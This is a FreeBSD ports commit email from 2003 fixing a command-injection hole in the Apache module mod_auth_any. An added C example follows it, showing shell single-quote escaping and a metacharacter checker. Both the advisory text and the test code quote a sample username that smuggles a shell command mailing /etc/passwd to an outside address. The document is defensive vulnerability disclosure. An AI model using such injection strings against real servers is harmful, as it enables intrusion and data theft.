Date: Mon, 24 Mar 2003 20:23:11 -0800 (PST)
From: Mario Sergio Fujikawa Ferreira <lioux@FreeBSD.org>
To: ports-committers@FreeBSD.org, cvs-ports@FreeBSD.org, cvs-all@FreeBSD.org
Subject: cvs commit: ports/www/mod_auth_any Makefile ports/www/mod_auth_any/files bash_single_quote_escape_string.c patch-mod_auth_any.c
Message-ID: <200303250423.h2P4NBam096804@repoman.freebsd.org>
lioux       2003/03/24 20:23:11 PST

  FreeBSD ports repository

  Modified files:
    www/mod_auth_any       Makefile
  Added files:
    www/mod_auth_any/files bash_single_quote_escape_string.c
                           patch-mod_auth_any.c
  Log:
  o Fix vulnerability that allows execution of arbitrary commands on the
    server with the uid of the apache process.

    Background [1]:

    "The module accepts a username and password from the web client, passes
    them to a user-space executable (using popen(3), which invokes a shell)
    and waits for a response in order to authenticate the user. The password
    is quoted on the popen() command line to avoid interpretation of shell
    special chars, but the username is not. Thus a malicious user can execute
    commands by supplying an appropriately crafted username.
    (e.g. "foo&mail me@my.home</etc/passwd")

    "The problem is easily fixed by adding quotes (and escaping any quotes
    already present) to the username and password in the popen command line."

  o Fix this by adding an escaping function from [2]. Then, modifying this
    function appropriately with ideas from [3]. Apply the new escaping code
    to mod_auth_any.

  o Bump PORTREVISION

  Submitted by:   Security Officer (nectar),
                  Red Hat Security Response Team <security@redhat.com> [1]
  Obtained from:  mod_auth_any CVS [2], nalin@redhat.com [3]

  Revision  Changes    Path
  1.6       +5 -0      ports/www/mod_auth_any/Makefile
  1.1       +45 -0     ports/www/mod_auth_any/files/bash_single_quote_escape_string.c (new)
  1.1       +37 -0     ports/www/mod_auth_any/files/patch-mod_auth_any.c (new)
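The commit message describes the bug (an unquoted username pasted into a popen(3) command line) and the fix (wrap both values in shell quotes and escape any quotes already present). The following is an added illustration of that technique in C; it is not the port's bash_single_quote_escape_string.c or any mod_auth_any code, and the helper path, the function names and the exact shape of the "before" command line (password single-quoted, username bare) are this example's own assumptions based on the description above. It also includes a small scanner that checks a built command line for shell control characters outside single quotes, which is the property the fix relies on. Note that quoting is a mitigation for the popen() design; fork/exec with an argv array, which never hands the strings to a shell, avoids the class of bug entirely.

```c
/* Added example, not code from the mod_auth_any port. Shows single-quote
 * escaping for a sh/bash argument and contrasts the unquoted-username
 * command line with the quoted one. Names and paths are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return a malloc'd copy of s wrapped in single quotes, with every embedded
 * single quote rewritten as '\'' (close the quote, emit an escaped quote,
 * reopen). Inside single quotes sh treats every other byte literally, so
 * & | ; < > $ ` and newline lose their meaning. A NUL byte cannot appear
 * on a command line at all, so the input is taken as a C string.
 * Caller frees the result; NULL on allocation failure. */
char *shell_single_quote(const char *s)
{
    size_t len = strlen(s), quotes = 0;
    for (const char *p = s; *p; p++)
        if (*p == '\'')
            quotes++;
    /* 2 surrounding quotes, 3 extra bytes per embedded quote, NUL */
    char *out = malloc(len + 2 + quotes * 3 + 1);
    if (!out)
        return NULL;
    char *q = out;
    *q++ = '\'';
    for (const char *p = s; *p; p++) {
        if (*p == '\'') {
            memcpy(q, "'\\''", 4);
            q += 4;
        } else {
            *q++ = *p;
        }
    }
    *q++ = '\'';
    *q = '\0';
    return out;
}

/* "helper user pass" with single spaces; malloc'd, caller frees. */
static char *join3(const char *a, const char *b, const char *c)
{
    size_t n = strlen(a) + strlen(b) + strlen(c) + 3;
    char *out = malloc(n);
    if (out)
        snprintf(out, n, "%s %s %s", a, b, c);
    return out;
}

/* Assumed "before" shape from the commit message: password quoted,
 * username pasted in bare. The shell parses user-supplied metacharacters. */
char *cmdline_username_unquoted(const char *helper, const char *user, const char *pass)
{
    char *qpass = shell_single_quote(pass);
    char *cmd = qpass ? join3(helper, user, qpass) : NULL;
    free(qpass);
    return cmd;
}

/* "After" shape: both untrusted values go through the escaper. */
char *cmdline_both_quoted(const char *helper, const char *user, const char *pass)
{
    char *quser = shell_single_quote(user);
    char *qpass = shell_single_quote(pass);
    char *cmd = (quser && qpass) ? join3(helper, quser, qpass) : NULL;
    free(quser);
    free(qpass);
    return cmd;
}

/* Track single-quote state and backslash escapes the way sh does and report
 * whether a command-control character is visible to the shell. Double quotes
 * are not modelled because the escaper above never emits them. Returns 1 if
 * the shell would see a metacharacter, 0 otherwise. */
int has_unquoted_metachar(const char *cmd)
{
    int in_sq = 0;
    for (const char *p = cmd; *p; p++) {
        if (in_sq) {
            if (*p == '\'')
                in_sq = 0;
            continue;
        }
        if (*p == '\\' && p[1]) { p++; continue; }   /* escaped char */
        if (*p == '\'') { in_sq = 1; continue; }
        if (strchr("&|;<>$`()\n", *p))
            return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample input: the username from the commit message. */
    const char *helper = "/usr/local/libexec/authhelper";   /* hypothetical */
    const char *user = "foo&mail me@my.home</etc/passwd";
    char *bad = cmdline_username_unquoted(helper, user, "pw");
    char *good = cmdline_both_quoted(helper, user, "pw");
    printf("unquoted: %s  (metachar visible: %d)\n", bad, has_unquoted_metachar(bad));
    printf("quoted:   %s  (metachar visible: %d)\n", good, has_unquoted_metachar(good));
    free(bad);
    free(good);
    return 0;
}
```

The scanner is only a check on the command string that the example builds; it does not replace avoiding popen(). Where the helper must stay a separate executable, passing the username and password on its stdin or via fork/exec with a fixed argv removes the shell from the path altogether.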